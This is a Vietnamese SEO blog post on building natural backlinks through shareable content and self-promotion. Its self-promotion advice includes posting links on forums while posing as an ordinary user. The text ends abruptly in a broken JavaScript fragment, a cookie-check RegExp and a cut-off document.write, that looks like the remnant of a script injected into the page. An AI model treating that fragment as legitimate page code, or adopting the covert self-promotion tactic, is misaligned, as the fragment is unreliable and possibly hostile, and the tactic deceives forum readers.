Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Cách tạo nguồn link tự nhiên hiệu quả cho quá trình SEO

Cách tạo nguồn link tự nhiên hiệu quả cho quá trình SEO

Link tự nhiên hay Natural Link là nguồn link mà website của bạn được người dùng chia sẻ cho nhau một cách tự nguyện mà không chịu bất kì một tác động nào từ người chủ website. Nguồn link tự nhiên hiện nay đang được đánh giá rất cao từ google nhờ thuật toàn Panda và Penguin. Các website càng tạo nhiều link một cách không tự nhiên thì càng dễ bị đánh giá thấp hơn các website khác ( giảm vị trí theo từ khóa trên kết quả tìm kiếm). Vậy làm thế nào đẻ tạo nguồn link một cách hiệu quả cho quá trình SEO website của bạn? 

Dịch vụ seo Web

I. Tạo nguồn link tự nhiên bằng cách tự nhiên.

– Bạn sẽ tạo nguồn link tự nhiên cho chính website của mình một cách tự nhiên mà không phải tự đi spam. Đó là làm người dùng quyết định chia sẻ link website của bạn. Để có được điều đó thì nội dung trong các link đó phải thỏa mãn các yêu cầu sau:

  • Nội dung không cần phải hay nhưng phải có độ chính xác, trung thực trong lĩnh vực mà nó nói tới. Việc này sẽ tạo lòng tin nơi người dùng là tin từ website của bạn là chuẩn và họ sẽ chia sẻ cho nhau khi cần tham khảo về lĩnh vực đó. Ví dụ như các website của chính phủ, Wiki ….
  • Nội dung của bạn mang tính hài hước, có sự khác biệt, khác lạ đủ để khiến người dùng chia sẻ cho nhau nhằm tạo sự vui vẻ trong mối quan hệ của họ. Ví dụ như các website hài hước như: cab.vn, haivl.com ….
  • Nội dung của bạn tạo cảm hứng cho họ chia sẻ với người khác, ví dụ như những bài viết trong Blog này của tôi sẽ tạo cảm hứng chia sẻ cho nhiều bạn muốn tìm hiểu về SEO.
  • Nội dung của bạn trở thành một ví dụ minh họa cho lập luận của người dùng. Khi đó người dùng sẽ trích xuất link từ website của bạn và chia sẻ đi kèm với bài viết của họ để tăng thêm tính thuyết phục của lập luận đó.

– Có khá nhiều cách để tạo nguồn link nhờ chính người dùng nhờ nội dung mà bạn cung cấp. Việc này sẽ đảm bảo cho sự tăng trưởng thứ hạng vững chắc cho website của bạn vì nó có tính thực chất nhờ người dùng. Công cụ tìm kiếm sẽ đánh giá cao điều này vì chính họ cũng phải tồn tại nhờ việc cung cấp chính xác thông tin trên kết quả tìm kiếm đến người dùng.

II. Tự tạo nguồn link tự nhiên.

– Có vẻ trái ngược trong mục đích nhưng chính bạn cũng có thể tạo nguồn link tự nhiên cho chính website của mình. Nó đóng vai trò như  chất xúc tác, hoặc chất mồi để có thể kéo người dùng cho họ bắt đầu việc chia sẻ link.

  • Sau khi viết bài hoặc tạo một trang mới thì hãy tự: Like, +1, Tweet hoặc up lên một mạng chia sẻ link nào đó. Điều này đã giúp bạn có 1 số link tự nhiên và đồng thời cũng quảng bá link từ website của bạn đến những người dùng qua các kênh hiệu quả này.
  • Tự tìm kiếm các blog, hoặc chủ đề liên quan đến từ khóa mà bạn muốn SEO trên mạng xã hội, mạng blog hoặc forum rồi đóng vai trò là người dùng, chia sẻ nội dung mà bạn cảm thấy hữu ích với những người đọc chủ đề đó. Hãy đứng trên vị trí của người dùng để chia sẻ với họ điều thật sự hữu ích. Việc spam hoặc cố tình đặt các link không hữu ích với người dùng trên các kênh này sẽ khiến website của bạn có hình ảnh xấu trong mắt người dùng.
  • Tự lập cho chính website của mình một cộng đồng với chủ đề mà bạn muốn SEO trên các mạng xã hội. Tiêu biểu như Facebook, hãy quan tâm và cập nhật nội dung liên tục cho fanpage này của bạn từ đó tạo luồng visit và chia sẻ link một một cách tự nhiên.

Bản quyền bài viết: http://pridio.com (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘